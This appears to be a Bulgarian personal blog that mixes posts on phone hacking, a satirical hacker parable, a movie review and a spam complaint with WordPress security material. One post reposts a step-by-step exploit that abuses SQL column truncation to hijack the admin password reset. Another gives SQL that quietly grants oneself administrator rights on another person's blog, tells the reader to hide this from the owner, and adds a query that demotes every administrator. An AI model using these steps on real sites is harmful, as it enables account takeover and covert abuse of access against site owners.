– при получаване на SMS не може да се хакне всеки телефон
– преди да получиш съобщение по Bluetooth – първо трябва да го позволиш

Ясно е, че разни телефони могат да се експлойтнат чрез SMS, но съм чувал и виждал САМО заключване и отключване на телефон, по-конкретно на Nokia, още по-конкретно — старите модели. Ясно ми е, че при определени обстоятелства може да се експлойтне и операционната система на телефон, ако се таркаля symbian, въпреки затворения код. Но…някак си ми е любопитно как се спестяват логовете при оператора. На практика това не ми се струва възможно. Виждал съм hidden call, но на разпечатката никак не беше hidden. Не съм сигурен колко тази статия е блъф от страна на “Стандарт”, защото това се е случвало и преди.

Е…кои вестници останаха за четене? Капитал/Дневник, Култура, донякъде и Топспорт…защо няма обективни медии?

Ако не ме мързеше и аз щях да бодна тази глупост и да крашя прозорците на посетителите.

Ден 2-ри
Директорът сред прочие делови писма прочита горното и вдига рамене: “На кой идиот може да му дойде това на ума?”

Ден 5-ти
Хакерът идва в столовата и сипва във всички солници отрова. Загиват 300 души, директора три месеца го влачат в следствие и съд и го оправдават за липса на престъпен състав. Хакерът пише писмо в стил “Видяхте ли?!!”

Ден 96-ти
Директорът купува солници със специално проектиран катинар с код. Посетителите чувстват, че някаква идея в тоя живот им убягва.

Ден 97-ми
Хакерът забелязва, че дупките в солниците пропускат сол в двете посоки. И не само сол. Той пише възмутено писмо на директора и пикае във всички солници. 300 човека престават да посещават столовата, 30 попадат в болница с отравяне. За капак пише на директора СМС “Как е?” Директора три месеца го мотаят по съдилища и му дават година условно.

Ден 188-ми
Директорът се заклева до края на живота си да няма нищо общо със заведения за хранене и мирно да пренася дървени трупи в Сибир. Инженерите разработват нова конструкция солници с едностранна клапа. Междувременно сервитьорките прибират старите солници и раздават сол по заявка.

Ден 190-ти
Хакерът гепва 1 нова солница от стола и вкъщи изучава устройството й. Пише гневно писмо на новия директор: “Аз, meG@Duc|, задигнах 1 солница и намирам този факт за възмутителен! Всеки може да задигне солница от Вашата столова!” Директорът – заклет трезвеник – прочита писмото, прибира се вкъщи и удря една водка.

Ден 193-ти
Хакерът отива в стола и вижда, че всички солници са закрепени към масите с вериги. На поредната сбирка на хакерите се похвалва със своите успехи и получава заслужена награда за защита интересите на обществото и потребителите. За щастие директорът не научава за това и няма да се пропие преждевременно.

Ден 194-ти
В рамките на гениално обмислена операция всички хакери от сбирката се промъкват в столовата и изсипват всичката сол в джобовете си. Хакерът meG@Duc| пише възмутено писмо на директора, че в тази столова няма никаква грижа към потребителя и всеки може да лиши честния човек от сол за един миг. Спешно са нужни дозатори на солта, работещи след логване с парола.

Ден 196-ти
Инженерите с пот на лицата работят над нов модел солница, докато сервитьорките пак раздават сол по заявка. Директорът си взема отпуск и заминава на Сейшелските острови, където се храни само в стаята си в хотела, избягвайки закусвални, ресторанти и барове.

Ден 200
Посетителите на столовата с ужас откриват, че за да си сипят малко сол, трябва да отидат при сервитьорката и да си покажат личната карта, за да получат специален 8-символен код за еднократна употреба за активиране на солницата. За черния пипер процедурата се повтаря.

После пак ми хвалете MsSQL…

# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends

1. go to url: server.com/wp-login.php?action=register

2. register as:

login: admin x
email: your email

^ admin[55 space chars]x

now, we have duplicated ‘admin’ account in database

3. go to url: server.com/wp-login.php?action=lostpassword

4. write your email into field and submit this form

5. check your email and go to reset confirmation link

6. admin’s password changed, but new password will be send to correct admin email ;/

# milw0rm.com [2008-09-07]

Източник: http://www.milw0rm.com/exploits/6397

Аз още кретам на 2.6, гледам, че и при 2.6.1 е такава дупката…та моя съвет е докато не излезе кръпка – ако сте позволили регистрации в блога си – да ги спрете. То и преди време имаше подобна глупост, но тогава ако не ме бъркат спомените всеки регистриран беше едитор…не помня.

Но си спрете регистрациите за по-сигурно, че мен Киро ме изненада

Трябва да пингна крокодила да вземе да допълни малко Admin Wall of shame

Странно, че ще го кажа, но филма ми хареса. В крайна сметка Бен шашна човека на интервюто с историята на този необикновен развой на живота му.

Заслужава си да го гледате, особено ако харесвате игрите с карти. Но от сега ви казвам, че вероятността да направите това, което хлапетата са направили е почти нулева

Оценка: 8/10

Казус: Иска да й помогнете с настройки, обаче нали нямате права – трябва да си получите такива, въпреки отказа й да предостави парола или да прочете документацията кое как се прави.

Може би хората, които от скоро се занимават с wordpress или пък се занимават отдавна, но само с писане биха изпитали трудност със ситуацията. Но ако първите две изречения от постановката отговарят на вашата ситуация – не се притеснявайте, няма нужда да четете глупостите по-надолу.

Та…архитектурата на базата данни на wordpress е нещо много хубаво, дори ако мога да кажа си е user-friendly. Има обаче една хватка, която е хубаво да се знае. Та, за да разрешите казуса трябва да направите няколко елементарни стъпки.

0. Взимате си бира.
1. Ако нямате регистрация в блога на човека, на който ще помагате – направете си. Отнема точно минутка, в най-лошият случай две.
2. Виждате ID-то си. От там изсипвате едно елементарно парче SQL:

UPDATE `victim`.`wp_usermeta` SET `meta_value` = 'a:1:{s:13:"administrator";b:1;}' WHERE `wp_usermeta`.`umeta_id` =21 LIMIT 1 ;

3. Да се радвате на администраторските права в блога на “жертвата” (както виждате, така сме кръстили условно базата)
4. Разрешавате проблема, като пропускате да споменете за SQL каскадата и чисто новите ви администраторски привилегии (с които хубаво е да не прекалявате и да не правите мизерии).

В общи линии е това. Мисълта ми беше за тази уловка. Привилегиите на акаунта не се пазят в wp_users -> user_status както си мислят повечето хора. Пазят си се в wp_usermeta -> meta_value.

Да, винаги може да направите мизерия:

UPDATE `victim`.`wp_usermeta` SET `meta_value` = 'a:1:{s:10:"subscriber";b:1;}' WHERE CONVERT( `wp_usermeta`.`meta_value` USING utf8 ) = 'a:1:{s:13:"administrator";b:1;}' ;

Но имайте едно наум, че с тази мизерия ще си навлечете сериозни проблеми

Обръщам се към @pesho и към @Nick.

Преди време казах, че Апостол Апостолов ще налази и върху edno23.com. Не се мина и месец и получих едно интересно “Директно” съобщение от Апостол Апостолов. Не ми се занимаваше грам с реакция. Днес реших да видя дали той е наспамил и други хора. След десет минути имах готов отговор:

Мисля, че е хубаво да спрете налазването му в edno23.com
Хубаво е микроблогът да се използва по предназначение, не за да досаждащ на другите, нали ?!

Поздрави и очаквам реакцията ви

П.П. Все пак истината си остава истина – никой не иска да говори с него

Edit: браво! Администраторите веднага реагираха: http://nick.edno23.com/view/post:25960

За което ги поздравявам